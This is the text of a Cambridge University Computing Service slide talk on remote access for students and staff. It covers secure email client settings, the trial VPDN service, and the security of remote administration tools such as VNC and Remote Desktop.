Remote Access to Cambridge

Resources

A current digest of possible ways to

deal with a variety of requirements.
 Remote Access to Resources in
Cambridge
• Increasingly both students and staff of the
University want (and often expect) resources to be
available to them wherever they are.
• For security and licensing purposes such access
can be difficult for most users to “get their heads
round”, and a seamless solution is not always
possible.
• The range and variety of such resources is often
means that a variety of solutions are required.
 What type of access?
• One of the most frequently asked questions is “I'm
away from Cambridge and now although I can
read my email, I can't seem to send it”.
• The answer used to be “Use webmail”.
Unfortunately most users think that any solution
which means that they can't use the software they
are used to (which might of course be webmail) is
a poor second best and leads to answers of the
“Yes but” type.
 Email Access
• The mail group have now developed a secure
solution for this problem which works with most
of the common varieties of MUA (mail clients)
including Outlook, Mulberry, Outlook Express,
Pine, Opera, PC-Pine, Entourage and Apple Mail
amongst others.
• Details of how to configure these can be found at
http://www.cam.ac.uk/cs/email/muasettings.html
• Earlier versions of Outlook Express (any version
up to and including 5) will not work with hermes
in this way.
 Email Access
• The current version of Mulberry (3.1.6) is now
configured to work with SSL.
• Unfortunately most email clients are not
configured to work this way “out of the box”,
although the Computing Service would obviously
prefer everybody to use this type of access for
security reasons.
• The most important check to make if you or your
users work in several different locations, (inside or
outside Cambridge) is that they are not using
POP. (The problem is fairly obvious).
General Access from outside Cam
• The (trial) VPDN service does make a wide variety
of resources available, but not all.
• Clients are available for Windows
(98/ME/NT/2000/XP/2003), MacOS X and Linux.
• Earlier problems with ICS-style and other
router/NAT setups are now curable.
• You will still need the CISCO client for Windows
2000 (unless you really enjoy hacking Windows
2000) and you are advised to use SP2 for XP (NAT
traversal problems).
 General Access from outside
Cam
• Leaflets on general configuration can be
found at:
http://www.cam.ac.uk/cs/docs/remote.html
• General information and FAQs can be
found at: http://www.cam.ac.uk/cs/netdiv/vpdn.html
 General Access from outside
Cam
• The VPDN makes some electronic resources available
(the details of which can be found on the University
Library web server).
• It makes the Cambridge new server (and posting)
available.
• Some users feel that it is a ‘magpie replacement’. Not
really true, but it serves a similar purpose.
• It is not necessarily very useful in another corporate
environment (or where a user needs to see both sides of a
Windows network) and should only be used when
necessary,
 RATs (Remote Administration
Tools)
• A RAT is defined by PestPatrol as “a Trojan
that when run, provides an attacker
with the capability of remotely
controlling a machine via a ""client"" in
the attacker's machine, and a ""server""
in the victim's machine”.”
• Unfortunately this is also what most
users now want to use to get access to
their desktop or home machine when
they are not physically present.
 RATs (Remote Administration
Tools)
• Anybody wanting to use a RAT in this way
should make sure that they are not using a
RAT which sends passwords “in clear” ie
so that they can be “snooped” over the
Internet.
• It is also important to ensure (even with
encrypted access) that strong passwords (or
alternate mechanisms) are used.
 RATs (Remote Administration
Tools)
• It is possible that some border routers may
block access to certain well-known ports
used by RATs.
• For example at least one English university
will not permit incoming 6129 calls (the
default Dameware port).
• Dameware is a favoured hacker RAT,
although of course it has legitimate uses.
 RATs (Remote Administration
Tools)
• Common examples of such utilities include
Microsoft’s Remote Desktop (previously known
as the Terminal Services client) in both PC and
Mac OS X versions.
• The “industry-standard” version used to be
pcAnywhere, now owned by Symantec.
• One which was developed in Cambridge
(originally) by AT&T is VNC (Virtual Network
Computing)
 RATs (Remote Administration
Tools)
• VNC’s commercial successors can be found at:
http://www.realvnc.com
• Other versions include TightVNC (
http://www.tightvnc.com) and at least another ten
ongoing projects available (search for VNC) at
http://www.sourceforge.org
• These are normally available for Windows, MaOS X
and Linux.
• Apple of course also have their own version of
Remote Desktop
 VNC Security Considerations
• Currently PC-Support deprecates most of
the free versions of VNC “out of the box”
since they normally send passwords (and
subsequent traffic) “in clear”, disastrously.
• Even TightVNC which does currently
encrypt passwords only encrypts a
password of up to eight characters! As their
FAQ page says, this is not enough…
 RAT Security in General
• I use Remote Desktop from home to access
my machine at work, but I also use the
VPDN so my traffic is doubly protected,
once by RDP, once by the VPDN tunnel.
• Even so a strong password (now defined in
the Windows world as 14 characters or
more of mixed alphanumeric/punctuation
type) is necessary.
 RAT Security in general
• If you want to use “clear-text” protocols think
about tunnelling or port-forwarding them.
• Cambridge-only addresses can be accessed from
outside cam.ac.uk using the VPDN.
• If you have older users who are dedicated to
telnet, introduce them to putty (with a default SSH
setting) and WinSCP for file transfer.
• Remember even encryption will not stop a brute
force attack if the system has weak passwords.
 Other Solutions
• There are a lot of other solutions (including
software like Exceed, vLANs, dedicated VPNs
between one machine and another) which cannot
be gone into in detail here but should be
considered, especially if a group of users is
involved.
• There are also dedicated hardware/network
solutions for such needs.
• Advice in this area can be sought from the help-
desk, who will direct it to the relevant group.